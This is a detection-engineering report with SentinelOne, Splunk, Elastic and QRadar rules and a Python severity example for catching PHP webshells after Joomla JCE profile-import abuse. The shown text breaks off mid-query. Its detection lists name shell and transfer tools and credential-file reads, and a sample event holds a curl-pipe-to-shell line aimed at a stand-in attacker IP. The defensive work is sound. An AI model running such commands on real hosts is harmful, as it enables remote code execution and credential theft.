Production-deployable where SentinelOne covers Joomla web servers and captures process creation, parent process, command line, process user, file telemetry, and network telemetry. This rule is strongest on self-managed Joomla hosts, dedicated web servers, and container hosts where web server processes can be separated from normal deployment, backup, and maintenance activity.
Rule
Joomla Web Server Service Context Execution With Writable PHP Artifact or Rare Egress
Rule Format
SentinelOne Deep Visibility query pattern for Joomla host behavior requiring local field validation.
Detection Purpose
Detect suspicious web server service-context execution, PHP-like file creation, sensitive Joomla file access, or outbound tooling that may indicate PHP webshell execution after JCE profile-import abuse.
Detection Logic
Trigger when a Joomla host records PHP-like file creation or modification in writable paths and web server service-context execution, transfer-tool use, shell invocation, archive-tool use, encoded command behavior, credential-file access, or rare outbound network activity.
Assign medium severity for unexpected PHP-like file creation in Joomla writable paths.
Assign high severity when unexpected PHP-like file creation aligns with web server service-context process execution, suspicious command line, sensitive file access, or outbound connection.
Promote to critical when correlated with JCE profile-import web activity, known rogue JCE profile state, credential-file access, database dump activity, webroot tampering, phishing or malware hosting, FTP or hosting-control abuse, or confirmed webshell artifact discovery.
Required Telemetry
SentinelOne process telemetry.
SentinelOne command-line telemetry.
SentinelOne parent process telemetry.
SentinelOne file telemetry.
SentinelOne network telemetry.
Joomla web server endpoint group.
Joomla webroot path mapping.
Joomla service account mapping.
Approved deployment-user lookup.
Approved deployment-command lookup.
Approved maintenance-window lookup.
Approved backup and restore workflow lookup.
Approved egress-destination lookup.
Engineering Implementation Instructions
Map EndpointName, EndpointId, AgentUuid, ProcessName, ProcessImagePath, ParentProcessName, ParentProcessImagePath, ProcessUser, CmdLine, FilePath, FileEventType, DstIp, DstPort, DstDomain, and EventTime.
Create ENV_JOOMLA_WEB_SERVERS, ENV_JOOMLA_WEBROOT_PATHS, ENV_JOOMLA_WRITABLE_PATHS, and ENV_WEB_SERVER_SERVICE_USERS.
Validate local web server process names, including apache2, httpd, nginx, php-fpm, lsphp, php-cgi, cgi-fcgi, litespeed, openlitespeed, container runtime parent processes, and systemd service paths.
Create exceptions for approved deployments, backup scripts, CMS updates, JCE updates, plugin updates, migration jobs, malware scanning, emergency cleanup, hosting-provider maintenance, and vulnerability validation workflows.
Run in hunt mode before alert mode to baseline normal Joomla maintenance, deployment, plugin update, cache generation, image processing, backup, and restore behavior.
Treat endpoint grouping, webroot path mapping, service-account mapping, approved command exceptions, maintenance-window suppression, writable-path validation, and alert routing as required local deployment work.
DRI Assessment
High where Joomla hosts have SentinelOne coverage with process lineage, command-line, file, and network telemetry enabled.
DRI
8.8 / 10
TCR Assessment
Strong for suspicious web server execution and writable PHP artifact creation when scoped to Joomla hosts. Strongest when correlated with JCE profile-import web activity, CMS profile state, or WAF logs.
Operational TCR
8.4 / 10
Full-Telemetry TCR
9.3 / 10
Limitations
Legitimate Joomla deployments, plugin updates, backups, migrations, security scans, and emergency remediation may create or modify PHP files. Shared-hosting environments may not provide endpoint telemetry. This rule must be scoped to Joomla web servers and tuned against approved deployment workflows before alert-mode deployment.
Detection Query Pattern
SentinelOne Deep Visibility / STAR translation pattern with local field mapping and suppression implementation required:
EndpointName IN ENV_JOOMLA_WEB_SERVERS
AND (
ProcessUser IN ENV_WEB_SERVER_SERVICE_USERS
OR SrcProcName IN ("apache2","httpd","nginx","php-fpm","lsphp","php-cgi","cgi-fcgi","litespeed","openlitespeed")
OR SrcProcCmdLine CONTAINS "php-fpm"
)
AND (
(
FilePath MATCHES "(/tmp/|/images/|/media/|/uploads/|/cache/|/templates/|/plugins/).*(\.php|\.phtml|\.phar|php\.)"
AND FileEventType IN ("created","modified","renamed","written")
)
OR
(
TgtProcName IN (
"sh","bash","dash","zsh","python","python3","perl","ruby","php","curl","wget","nc","ncat","socat","ssh","scp","tar","zip","7z","openssl"
)
AND CmdLine NOT IN LOOKUP("APPROVED_JOOMLA_DEPLOYMENT_COMMAND_PATTERNS")
AND CmdLine NOT IN LOOKUP("APPROVED_JOOMLA_BACKUP_COMMAND_PATTERNS")
)
OR
(
(
CmdLine CONTAINS "configuration.php"
OR CmdLine CONTAINS "/var/www/"
OR CmdLine CONTAINS "/public_html/"
OR CmdLine CONTAINS "mysqldump"
OR CmdLine CONTAINS "base64"
OR CmdLine CONTAINS "curl "
OR CmdLine CONTAINS "wget "
OR CmdLine CONTAINS "bash -c"
OR CmdLine CONTAINS "/bin/sh -c"
)
AND CmdLine NOT IN LOOKUP("APPROVED_JOOMLA_DEPLOYMENT_COMMAND_PATTERNS")
AND CmdLine NOT IN LOOKUP("APPROVED_JOOMLA_BACKUP_COMMAND_PATTERNS")
)
OR
(
DstDomain IS NOT NULL
AND DstDomain NOT IN LOOKUP("APPROVED_JOOMLA_EGRESS_DESTINATIONS")
)
)
AND maintenance_window = false
OUTPUT:
EndpointName
ProcessUser
SrcProcName
TgtProcName
CmdLine
ParentProcessName
FilePath
FileEventType
DstIp
DstDomain
EventTime
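The medium, high and critical tiers described under Detection Logic, evaluated in Python over constructed events shaped like the mapped fields (SrcProcName as the parent, TgtProcName as the child, a file path and event type, a destination domain). This is an added example for this report, not a SentinelOne query and not the rule itself. Assumed: the contents of the approved-user, approved-command and approved-egress lookups, the event shape, and one tier the rule text leaves unstated, namely that a lone service-context execution or rare egress without a PHP write is held at medium rather than dropped. The jce_import_hosts argument stands in for the correlation with JCE profile-import web activity that promotes a high finding to critical.

```python
import re

# Added example: severity tiering for Joomla host evidence. Lookup contents
# and the sample events are constructed, not the report's data.
WRITABLE_PHP = re.compile(
    r"(/tmp/|/images/|/media/|/uploads/|/cache/|/templates/|/plugins/)"
    r".*(\.php|\.phtml|\.phar|php\.)", re.I)
WEB_SERVER_PROCS = {"apache2", "httpd", "nginx", "php-fpm", "lsphp", "php-cgi",
                    "cgi-fcgi", "litespeed", "openlitespeed"}
ENV_WEB_SERVER_SERVICE_USERS = {"www-data", "apache", "nginx", "nobody", "litespeed"}
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "zsh", "python", "python3", "perl", "ruby",
                       "php", "curl", "wget", "nc", "ncat", "socat", "ssh", "scp",
                       "tar", "zip", "7z", "openssl"}
FILE_WRITE_EVENTS = {"created", "modified", "renamed", "written"}
APPROVED_DEPLOYMENT_USERS = {"deploy"}                                        # assumed
APPROVED_COMMAND_PATTERNS = [re.compile(r"^php /var/www/\S+/cli/\S+\.php\b")]  # assumed
APPROVED_EGRESS = {"update.joomla.org", "cdn.joomla.org"}                     # assumed
CREDENTIAL_OR_DUMP = ("configuration.php", "mysqldump")


def service_context(e):
    """ProcessUser in service users OR parent (SrcProcName) is a web server."""
    return (e.get("user") in ENV_WEB_SERVER_SERVICE_USERS
            or e.get("src_proc") in WEB_SERVER_PROCS)


def classify(e):
    """Name the signal one event contributes, or None when it is benign."""
    if e["kind"] == "file":
        if (WRITABLE_PHP.search(e["file_path"])
                and e["file_event"] in FILE_WRITE_EVENTS
                and e.get("user") not in APPROVED_DEPLOYMENT_USERS):
            return "unexpected_php_write"
        return None
    if not service_context(e):
        return None
    if e["kind"] == "process":
        cmd = e.get("cmdline", "")
        if any(p.search(cmd) for p in APPROVED_COMMAND_PATTERNS):
            return None
        if any(tok in cmd for tok in CREDENTIAL_OR_DUMP):
            return "credential_or_dump_access"
        if e.get("tgt_proc") in SUSPICIOUS_CHILDREN:
            return "service_context_exec"
        return None
    if e["kind"] == "network":
        dom = e.get("dst_domain")
        if dom and dom not in APPROVED_EGRESS:   # null guard: no domain, no signal
            return "rare_egress"
    return None


def assess(events, jce_import_hosts=frozenset(), maintenance_hosts=frozenset()):
    """Per endpoint: one signal -> medium, two or more kinds -> high; high plus
    credential/dump access or a JCE import on the same host -> critical."""
    per_host = {}
    for e in events:
        if e["endpoint"] in maintenance_hosts:        # maintenance_window = false
            continue
        sig = classify(e)
        if sig:
            per_host.setdefault(e["endpoint"], set()).add(sig)
    result = {}
    for host, sigs in per_host.items():
        sev = "medium" if len(sigs) == 1 else "high"
        if sev == "high" and ("credential_or_dump_access" in sigs
                              or host in jce_import_hosts):
            sev = "critical"
        result[host] = {"severity": sev, "signals": sorted(sigs)}
    return result


SAMPLE_EVENTS = [  # constructed; web-02 shows the deployment and cron exceptions
    {"endpoint": "web-01", "kind": "file", "user": "www-data", "src_proc": "php-fpm",
     "file_path": "/var/www/shop/images/stories/cache.php", "file_event": "created"},
    {"endpoint": "web-01", "kind": "process", "user": "www-data", "src_proc": "php-fpm",
     "tgt_proc": "sh", "cmdline": 'sh -c "curl -s http://203.0.113.9/x.sh | sh"'},
    {"endpoint": "web-01", "kind": "process", "user": "www-data", "src_proc": "sh",
     "tgt_proc": "cat", "cmdline": "cat /var/www/shop/configuration.php"},
    {"endpoint": "web-02", "kind": "file", "user": "deploy", "src_proc": "rsync",
     "file_path": "/var/www/blog/plugins/system/cache.php", "file_event": "modified"},
    {"endpoint": "web-02", "kind": "process", "user": "www-data", "src_proc": "cron",
     "tgt_proc": "php", "cmdline": "php /var/www/blog/cli/finder_indexer.php"},
    {"endpoint": "web-03", "kind": "network", "user": "www-data", "src_proc": "php-fpm",
     "dst_domain": "cdn-update-check.xyz"},
]
```

The approved-command exception is applied before the credential and interpreter checks, which is the order that keeps scheduled Joomla CLI jobs running as the service user from tripping the rule; the null guard on the destination domain matters because a NOT IN lookup test on an absent field would otherwise match every network event on the host.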
Splunk
Detection Viability Assessment
Production-deployable where Splunk ingests URI-preserving web logs, WAF or reverse-proxy logs, endpoint process telemetry, endpoint file telemetry, DNS/proxy logs, CMS audit or database change records where available, FTP logs, and hosting-control logs. Use normalized fields, lookups, bounded windows, and macros. Avoid broad raw searches across all web logs or unbounded joins.
Rule
Joomla JCE Profile Import Followed by Writable Path PHP Execution Evidence
Rule Format
Splunk SPL production correlation search with local index, sourcetype, macro, and lookup mapping.
Detection Purpose
Detect suspicious JCE profile-import activity followed by PHP-like file access, unexpected PHP file creation, web server service-context execution, sensitive Joomla file access, rare egress, or hosting-control activity.
Detection Logic
Trigger when suspicious JCE profile-import activity occurs and is followed within 60 minutes by one or more PHP execution or host-compromise signals on the same Joomla site, virtual host, backend host, or mapped asset.
Assign high severity when suspicious JCE profile-import activity aligns with writable-path PHP access, unexpected PHP file creation, web server service-context process execution, sensitive Joomla file activity, rare egress, FTP activity, or hosting-control activity.
Promote to critical when confirmed rogue profile state, credential-file access, database dump activity, webroot tampering, phishing or malware hosting, outbound callback behavior, or multiple-site compromise is observed.
Required Telemetry
Web access logs.
WAF logs.
Reverse-proxy logs.
Endpoint process logs.
Endpoint file logs.
DNS logs.
Proxy logs.
FTP logs where available.
Hosting-control logs where available.
Joomla CMS audit logs or database change records where available.
Approved Joomla administrator lookup.
Approved administrator source lookup.
Approved scanner lookup.
Approved hosting-provider support-source lookup.
Approved deployment-user lookup.
Approved maintenance-window lookup.
Approved egress-destination lookup.
Joomla/JCE asset lookup.
Engineering Implementation Instructions
Map indexes and sourcetypes for web logs, WAF logs, reverse-proxy logs, EDR process logs, EDR file logs, DNS/proxy logs, FTP logs, hosting-control logs, and CMS audit or database change records.
Normalize joomla_site_id, virtual_host, backend_host, dest_host, uri_path, query_string, full_url, http_method, src_ip, x_forwarded_for, user_agent, status, jce_profile_id, jce_profile_name, file_path, file_action, process_name, parent_process_name, process_user, command_line, dest_domain, ftp_user, hosting_user, and _time.
Create lookups for Joomla/JCE assets, approved administrators, approved admin sources, approved scanners, approved hosting-provider sources, approved deployment users, approved maintenance windows, approved PHP paths, approved command patterns, approved egress destinations, and approved hosting-control users.
Create Splunk macros for local field normalization, Joomla/JCE asset scoping, web writable-path detection, maintenance-window evaluation, and approved-source suppression before alert-mode deployment.
Validate macro expansion, lookup return fields, lookup key names, lookup output fields, and lookup suppression behavior before enabling alert mode.
Validate that web logs retain query strings and that virtual hosts can join to backend hosts and endpoint hostnames.
Run in hunt mode against at least 14 to 30 days of history to tune scanners, patch validation, CMS administration, plugin updates, backup restores, migrations, developer uploads, vulnerability validation, and emergency cleanup.
Treat local index mapping, field normalization, lookup creation, macro creation, join validation, false-positive baseline, query performance testing, and SOC workflow routing as required local deployment work.
DRI Assessment
High where Splunk can join web, WAF, endpoint, DNS/proxy, FTP, hosting-control, and CMS telemetry by Joomla site, virtual host, backend host, source, file path, process, and destination.
DRI
9.0 / 10
TCR Assessment
High when JCE profile-import activity is followed by writable-path PHP access or endpoint file/process evidence. Highest when CMS profile state or hosting-control telemetry is available.
Operational TCR
8.6 / 10
Full-Telemetry TCR
9.5 / 10
Limitations
Effectiveness depends on query-string logging, asset mapping, and endpoint or file telemetry. Legitimate scanners, patch validation, admin testing, migrations, backup restores, or cleanup actions may require exceptions. Two properties of the SPL below also need attention before alert mode: the bin _time span=60m grouping uses fixed clock-aligned buckets, so an import at 10:58 and a PHP access at 11:02 land in different buckets and never pair (widen the span, or replace the bin and stats pair with a transaction or streamstats time window if the missed-pair rate in hunt mode is material); and each append branch is a subsearch bound by the configured subsearch row and runtime limits, so a branch that returns truncated results silently weakens the correlation. Critical promotion requires stronger evidence than request telemetry alone.
Detection Query Pattern
Splunk SPL pattern requiring local lookup, macro, index, sourcetype, and field mapping:
search index=ENV_WEB_INDEX sourcetype IN (ENV_WEB_SOURCETYPES)
| `joomla_web_field_normalization`
| `joomla_jce_asset_scope`
| eval http_method=upper(coalesce(http_method,method))
| eval request_all=coalesce(full_url,url,request,"")
| eval query_all=coalesce(query_string,uri_query,url_query,"")
| where http_method="POST"
| where (
like(request_all,"%option=com_jce%")
OR like(query_all,"%option=com_jce%")
)
| where (
like(request_all,"%task=profiles.import%")
OR like(query_all,"%task=profiles.import%")
)
| lookup APPROVED_JOOMLA_ADMIN_SOURCES src_ip OUTPUT src_ip AS approved_admin_source
| lookup APPROVED_JOOMLA_SCANNERS src_ip OUTPUT src_ip AS approved_scanner_source
| lookup APPROVED_HOSTING_PROVIDER_SOURCES src_ip OUTPUT src_ip AS approved_hosting_provider_source
| where isnull(approved_admin_source)
AND isnull(approved_scanner_source)
AND isnull(approved_hosting_provider_source)
| eval normalized_site=coalesce(joomla_site_id,virtual_host,backend_host,dest_host)
| eval signal="suspicious_jce_profile_import"
| table _time normalized_site virtual_host backend_host dest_host src_ip x_forwarded_for user_agent uri_path query_string full_url http_method status signal
| append [
search index=ENV_WEB_INDEX sourcetype IN (ENV_WEB_SOURCETYPES)
| `joomla_web_field_normalization`
| `joomla_jce_asset_scope`
| eval http_method=upper(coalesce(http_method,method))
| eval uri_path=coalesce(uri_path,url_path,request_path,"")
| where http_method IN ("GET","POST")
| where match(uri_path,"(?i)(/tmp/|/images/|/media/|/uploads/|/cache/|/templates/|/plugins/).*(\.php|\.phtml|\.phar|php\.)")
| eval normalized_site=coalesce(joomla_site_id,virtual_host,backend_host,dest_host)
| eval signal="writable_path_php_access"
| table _time normalized_site virtual_host backend_host dest_host src_ip x_forwarded_for user_agent uri_path http_method status signal
]
| append [
search index=ENV_EDR_FILE_INDEX sourcetype=ENV_EDR_FILE_SOURCETYPE
| `joomla_jce_host_scope`
| eval file_path=coalesce(file_path,path,target_file_path,"")
| where match(file_path,"(?i)(/tmp/|/images/|/media/|/uploads/|/cache/|/templates/|/plugins/).*(\.php|\.phtml|\.phar|php\.)")
| search file_action IN ("created","modified","renamed","write","written")
| lookup APPROVED_JOOMLA_DEPLOYMENT_USERS process_user OUTPUT process_user AS approved_deployment_user
| where isnull(approved_deployment_user)
| eval normalized_site=coalesce(joomla_site_id,host,dest_host)
| eval signal="unexpected_writable_php_file"
| table _time normalized_site host dest_host file_path file_action process_name process_user signal
]
| append [
search index=ENV_EDR_PROCESS_INDEX sourcetype=ENV_EDR_PROCESS_SOURCETYPE
| `joomla_jce_host_scope`
| eval process_name=coalesce(process_name,process,Image,process_exec)
| eval parent_process_name=coalesce(parent_process_name,parent_process,ParentImage,parent_name)
| eval command_line=coalesce(command_line,cmdline,process_command_line,CommandLine,"")
| eval process_user=coalesce(process_user,user,User)
| eval process_basename=lower(replace(process_name,"^.*[\\\\/]",""))
| eval parent_process_basename=lower(replace(parent_process_name,"^.*[\\\\/]",""))
| where (
process_user IN ("www-data","apache","nginx","nobody","litespeed")
OR parent_process_basename IN ("apache2","httpd","nginx","php-fpm","lsphp","php-cgi","cgi-fcgi","litespeed","openlitespeed")
)
| where process_basename IN ("sh","bash","dash","zsh","python","python3","perl","ruby","php","curl","wget","nc","ncat","socat","ssh","scp","tar","zip","7z","openssl")
| `joomla_approved_command_suppression`
| where isnull(approved_command) OR approved_command!="true"
| eval normalized_site=coalesce(joomla_site_id,host,dest_host)
| eval signal="web_server_service_execution"
| table _time normalized_site host dest_host process_user process_name parent_process_name command_line signal
]
| append [
search index=ENV_DNS_OR_PROXY_INDEX sourcetype IN (ENV_DNS_OR_PROXY_SOURCETYPES)
| `joomla_jce_egress_scope`
| eval dest_domain=coalesce(dest_domain,query,domain,url_domain,dns_query)
| eval src_host=coalesce(src_host,host,src,dest_host)
| lookup APPROVED_JOOMLA_EGRESS_DESTINATIONS dest_domain OUTPUT dest_domain AS approved_joomla_egress_destination
| lookup APPROVED_BUSINESS_DOMAINS dest_domain OUTPUT dest_domain AS approved_business_domain
| where isnotnull(dest_domain) AND dest_domain!=""
AND isnull(approved_joomla_egress_destination)
AND isnull(approved_business_domain)
| eval normalized_site=coalesce(joomla_site_id,src_host,host)
| eval signal="rare_joomla_host_egress"
| table _time normalized_site src_host host dest_domain dest_ip signal
]
| bin _time span=60m
| stats
values(signal) AS signals
values(src_ip) AS src_ips
values(x_forwarded_for) AS x_forwarded_for
values(user_agent) AS user_agents
values(uri_path) AS uri_paths
values(query_string) AS query_strings
values(full_url) AS full_urls
values(status) AS statuses
values(file_path) AS file_paths
values(file_action) AS file_actions
values(process_name) AS processes
values(parent_process_name) AS parent_processes
values(command_line) AS command_lines
values(dest_domain) AS dest_domains
values(dest_ip) AS dest_ips
min(_time) AS first_seen
max(_time) AS last_seen
BY normalized_site _time
| eval has_import=if(mvfind(signals,"suspicious_jce_profile_import")>=0,1,0)
| eval has_execution_evidence=if(
mvfind(signals,"writable_path_php_access")>=0
OR mvfind(signals,"unexpected_writable_php_file")>=0
OR mvfind(signals,"web_server_service_execution")>=0
OR mvfind(signals,"rare_joomla_host_egress")>=0,
1,0
)
| where has_import=1 AND has_execution_evidence=1
| lookup APPROVED_JOOMLA_MAINTENANCE_WINDOWS normalized_site OUTPUT maintenance_window
| where isnull(maintenance_window) OR maintenance_window!="true"
| eval severity="high"
| eval cyberdax_rule="Joomla JCE Profile Import Followed by Writable Path PHP Execution Evidence"
| table first_seen last_seen normalized_site severity signals src_ips x_forwarded_for user_agents uri_paths query_strings statuses file_paths file_actions processes parent_processes command_lines dest_domains dest_ips cyberdax_rule
Elastic
Detection Viability Assessment
Production-deployable after local ECS, value-list, exception-list, and rule-type validation where Elastic has URI-preserving web logs, WAF or reverse-proxy events, endpoint process events, endpoint file events, DNS/proxy events, and enrichment linking Joomla sites to host identity. Exception logic must be implemented using Elastic exception lists, value lists, event filters, transforms, or equivalent local rule exceptions.
Rule
Joomla JCE Import to Writable PHP Execution Sequence
Rule Format
Elastic EQL production sequence with Elastic exception lists, value lists, transforms, and local ECS mapping.
Detection Purpose
Detect suspicious JCE profile-import activity followed by PHP-like file access, unexpected PHP file creation, web server service-context execution, sensitive file access, or rare outbound communication.
Detection Logic
Trigger when suspicious JCE profile-import activity is followed within 60 minutes by writable-path PHP access, unexpected PHP-like file creation, suspicious web server process execution, or rare outbound communication on the same Joomla host or mapped virtual host.
Assign high severity when the sequence occurs on a Joomla/JCE asset outside approved maintenance.
Promote to critical when the same host or site is tied to rogue JCE profile state, credential-file access, database dump activity, content tampering, FTP abuse, hosting-control activity, phishing or malware hosting, or confirmed webshell artifact discovery.
Required Telemetry
Reverse-proxy events.
WAF events.
Web access events.
Endpoint process events.
Endpoint file events.
DNS or proxy events.
Joomla/JCE asset enrichment.
Elastic value list for Joomla/JCE sites.
Elastic value list for approved Joomla administrator sources.
Elastic value list for approved scanners.
Elastic value list for approved hosting-provider sources.
Elastic value list for approved deployment users.
Elastic value list for approved egress destinations.
Elastic exception list for approved maintenance windows.
Elastic exception list for approved command patterns.
Engineering Implementation Instructions
Map event.dataset, url.path, url.query, url.full, http.request.method, http.response.status_code, source.ip, user_agent.original, host.name, joomla.site.id, joomla.virtual_host, process.name, process.command_line, process.parent.name, user.name, file.path, event.action, destination.domain, destination.ip, and @timestamp.
Create Elastic value lists for Joomla/JCE sites, approved administrator CIDRs, approved scanners, approved hosting-provider sources, approved deployment users, approved egress destinations, approved writable PHP paths, and approved Joomla maintenance sources.
Create Elastic exception rules for approved maintenance windows, approved deployment workflows, approved plugin updates, approved backup restores, approved vulnerability validation, and approved command patterns.
If Elastic cannot express a maintenance-window exception directly in EQL, implement maintenance-window suppression through rule exceptions, alert suppression, post-processing, or detection-engineering workflow logic.
Validate join keys between proxy/WAF events, endpoint events, file events, DNS/proxy events, and Joomla asset enrichment before alert mode.
Treat local ECS mapping, value-list creation, exception-list creation, transform configuration, join-key validation, alert severity tuning, historical baselining, and rule-action routing as required local deployment work.
DRI Assessment
High where Joomla web, endpoint, file, and network events share reliable host and site identity.
DRI
8.8 / 10
TCR Assessment
Strong when suspicious JCE profile-import activity is followed by writable-path PHP access or endpoint file/process telemetry. Weaker where endpoint telemetry is absent.
Operational TCR
8.3 / 10
Full-Telemetry TCR
9.3 / 10
Limitations
EQL sequence quality depends on reliable join keys. Query-string visibility is required for strong request detection. Legitimate scanner, patch validation, plugin update, migration, backup, or cleanup activity must be exceptioned. Critical promotion requires CMS profile, file, endpoint, hosting-control, or content-impact evidence.
Detection Query Pattern
Elastic EQL sequence pattern with value-list, exception-list, transform-backed enrichment, and local ECS mapping required. The $NAME tokens are placeholders, not EQL syntax: EQL cannot read a value list inline, so each in $LIST and not ... in $LIST clause must be realized as a rule exception item backed by that value list, as an enrich-processor field set at ingest (for example a boolean flag marking Joomla/JCE sites), or as an index-pattern scope, and the clause removed from the query text:
sequence by joomla.site.id with maxspan=60m
[ any where
event.dataset in ("ENV_REVERSE_PROXY_DATASET","ENV_WAF_DATASET","ENV_WEB_ACCESS_DATASET") and
http.request.method == "POST" and
(
url.full like "*option=com_jce*" or
url.query like "*option=com_jce*"
) and
(
url.full like "*task=profiles.import*" or
url.query like "*task=profiles.import*"
) and
joomla.site.id in $JOOMLA_JCE_SITES and
not source.ip in $APPROVED_JOOMLA_ADMIN_SOURCES and
not source.ip in $APPROVED_JOOMLA_SCANNERS and
not source.ip in $APPROVED_HOSTING_PROVIDER_SOURCES
]
[ any where
(
event.dataset in ("ENV_REVERSE_PROXY_DATASET","ENV_WAF_DATASET","ENV_WEB_ACCESS_DATASET") and
http.request.method in ("GET","POST") and
joomla.site.id in $JOOMLA_JCE_SITES and
url.path regex~ """.*(/tmp/|/images/|/media/|/uploads/|/cache/|/templates/|/plugins/).*(\.php|\.phtml|\.phar|php\.).*"""
)
or
(
event.category == "file" and
joomla.site.id in $JOOMLA_JCE_SITES and
file.path regex~ """.*(/tmp/|/images/|/media/|/uploads/|/cache/|/templates/|/plugins/).*(\.php|\.phtml|\.phar|php\.).*""" and
event.action in ("open","read","modification","creation","rename","write") and
not user.name in $APPROVED_JOOMLA_DEPLOYMENT_USERS
)
or
(
event.category == "process" and
joomla.site.id in $JOOMLA_JCE_SITES and
(
user.name in $WEB_SERVER_SERVICE_USERS or
process.parent.name in ("apache2","httpd","nginx","php-fpm","lsphp","php-cgi","cgi-fcgi","litespeed","openlitespeed")
) and
process.name in ("sh","bash","dash","zsh","python","python3","perl","ruby","php","curl","wget","nc","ncat","socat","ssh","scp","tar","zip","7z","openssl") and
not process.command_line in $APPROVED_JOOMLA_COMMAND_PATTERNS
)
or
(
event.category == "network" and
joomla.site.id in $JOOMLA_JCE_SITES and
destination.domain != null and
destination.domain != "" and
not destination.domain in $APPROVED_JOOMLA_EGRESS_DESTINATIONS
)
]
until
[ any where
event.dataset == "ENV_CHANGE_CONTROL_DATASET" and
joomla.site.id in $JOOMLA_JCE_SITES and
event.action in ("approved_joomla_maintenance_start","approved_cleanup_start","approved_patch_validation_start")
]
QRadar
Detection Viability Assessment
Production-deployable where QRadar parses web, WAF, reverse-proxy, EDR, DNS/proxy, FTP, hosting-control, and Joomla CMS or database events into reliable custom properties. This should be implemented as building blocks with an offense rule. The AQL patterns below are validation searches for building-block logic, not standalone production alerts.
Rule
Joomla JCE Profile Import Abuse With PHP Execution Offense
Rule Format
QRadar building-block and offense-rule implementation pattern with AQL validation searches.
Detection Purpose
Correlate suspicious JCE profile-import activity with writable-path PHP access, unexpected PHP file activity, web server process execution, rare egress, FTP activity, hosting-control activity, or CMS profile-state changes.
Detection Logic
Trigger building block one when a Joomla/JCE asset receives suspicious POST activity involving option=com_jce and task=profiles.import.
Trigger building block two when web or WAF telemetry shows access to PHP-like files in writable Joomla paths.
Trigger building block three when endpoint, file, DNS/proxy, FTP, hosting-control, or CMS telemetry shows unexpected PHP file creation, web server service-context process execution, sensitive Joomla file access, rare egress, FTP changes, hosting-control changes, or rogue JCE profile state.
Create a high-severity offense when building block one and either building block two or building block three occur on the same Joomla site, virtual host, backend host, or mapped endpoint within 60 minutes.
Promote to critical when credential-file access, database dump activity, confirmed webshell artifact, phishing or malware hosting, hosted-content modification, multiple-site compromise, or hosting-control abuse occurs within 120 minutes.
Required Telemetry
Web access logs.
WAF logs.
Reverse-proxy logs.
Endpoint process logs.
Endpoint file logs.
DNS logs.
Proxy logs.
FTP logs where applicable.
Hosting-control logs where applicable.
Joomla CMS audit or database events where available.
Joomla/JCE asset reference set.
Approved administrator source reference set.
Approved scanner reference set.
Approved hosting-provider source reference set.
Approved maintenance-window reference set.
Approved egress-destination reference set.
Approved deployment-user reference set.
Engineering Implementation Instructions
Create custom properties for JOOMLA_SITE, VIRTUALHOST, BACKENDHOST, URLPATH, QUERYSTRING, FULLURL, HTTPMETHOD, SOURCEIP, XFORWARDEDFOR, USERAGENT, HTTPSTATUS, FILEPATH, FILEACTION, PROCESSNAME, COMMANDLINE, PROCESSUSER, DESTINATIONDOMAIN, DESTINATIONIP, FTPUSER, HOSTINGUSER, JCE_PROFILE_NAME, and JCE_PROFILE_ID.
Create reference sets for Joomla/JCE sites, approved administrators, approved admin sources, approved scanners, approved hosting-provider sources, approved maintenance windows, approved deployment users, approved PHP paths, approved command patterns, approved egress destinations, and approved hosting-control users.
Validate DSM parsing for each log source before enabling offense correlation.
Test each building block independently with historical data.
Treat DSM parsing, custom property creation, reference-set loading, building-block validation, offense magnitude, ownership routing, and suppression workflow as required local deployment work.
DRI Assessment
Moderate to high where QRadar custom properties and reference sets are reliable.
DRI
8.3 / 10
TCR Assessment
Strong when JCE profile-import activity, writable-path PHP access, and endpoint or file behavior can be joined by Joomla site or backend host. Lower when URI parsing or endpoint telemetry is incomplete.
Operational TCR
8.0 / 10
Full-Telemetry TCR
9.1 / 10
Limitations
QRadar effectiveness depends on DSM parsing quality, custom property accuracy, reference-set hygiene, and offense-rule correlation. Weak URI parsing or missing query strings will materially reduce confidence. Shared hosting without endpoint telemetry may require greater reliance on WAF, web logs, CMS profile review, file-system scanning, FTP logs, and hosting-control records.
Detection Query Pattern
QRadar building-block validation searches and offense logic:
BUILDING BLOCK ONE VALIDATION SEARCH:
SELECT QIDNAME(qid) AS event_name, JOOMLA_SITE, VIRTUALHOST, BACKENDHOST, URLPATH, QUERYSTRING, FULLURL, HTTPMETHOD, SOURCEIP, USERAGENT, HTTPSTATUS, starttime
FROM events
WHERE REFERENCESETCONTAINS('ENV_JOOMLA_JCE_SITES', JOOMLA_SITE)
AND HTTPMETHOD = 'POST'
AND (
LOWER(FULLURL) LIKE '%option=com_jce%'
OR LOWER(QUERYSTRING) LIKE '%option=com_jce%'
)
AND (
LOWER(FULLURL) LIKE '%task=profiles.import%'
OR LOWER(QUERYSTRING) LIKE '%task=profiles.import%'
)
AND NOT REFERENCESETCONTAINS('ENV_APPROVED_JOOMLA_ADMIN_SOURCES', SOURCEIP)
AND NOT REFERENCESETCONTAINS('ENV_APPROVED_JOOMLA_SCANNERS', SOURCEIP)
AND NOT REFERENCESETCONTAINS('ENV_APPROVED_HOSTING_PROVIDER_SOURCES', SOURCEIP)
LAST 60 MINUTES
BUILDING BLOCK TWO VALIDATION SEARCH:
SELECT QIDNAME(qid) AS event_name, JOOMLA_SITE, VIRTUALHOST, BACKENDHOST, URLPATH, HTTPMETHOD, SOURCEIP, USERAGENT, HTTPSTATUS, starttime
FROM events
WHERE REFERENCESETCONTAINS('ENV_JOOMLA_JCE_SITES', JOOMLA_SITE)
AND HTTPMETHOD IN ('GET','POST')
AND (
LOWER(URLPATH) LIKE '%/tmp/%'
OR LOWER(URLPATH) LIKE '%/images/%'
OR LOWER(URLPATH) LIKE '%/media/%'
OR LOWER(URLPATH) LIKE '%/uploads/%'
OR LOWER(URLPATH) LIKE '%/cache/%'
OR LOWER(URLPATH) LIKE '%/templates/%'
OR LOWER(URLPATH) LIKE '%/plugins/%'
)
AND (
LOWER(URLPATH) LIKE '%.php%'
OR LOWER(URLPATH) LIKE '%.phtml%'
OR LOWER(URLPATH) LIKE '%.phar%'
)
LAST 60 MINUTES
BUILDING BLOCK THREE VALIDATION SEARCH:
SELECT QIDNAME(qid) AS event_name, JOOMLA_SITE, BACKENDHOST, FILEPATH, FILEACTION, PROCESSNAME, COMMANDLINE, PROCESSUSER, DESTINATIONDOMAIN, DESTINATIONIP, FTPUSER, HOSTINGUSER, starttime
FROM events
WHERE REFERENCESETCONTAINS('ENV_JOOMLA_JCE_SITES', JOOMLA_SITE)
AND (
LOWER(FILEPATH) LIKE '%/configuration.php'
OR LOWER(FILEPATH) LIKE '%/tmp/%.php%'
OR LOWER(FILEPATH) LIKE '%/images/%.php%'
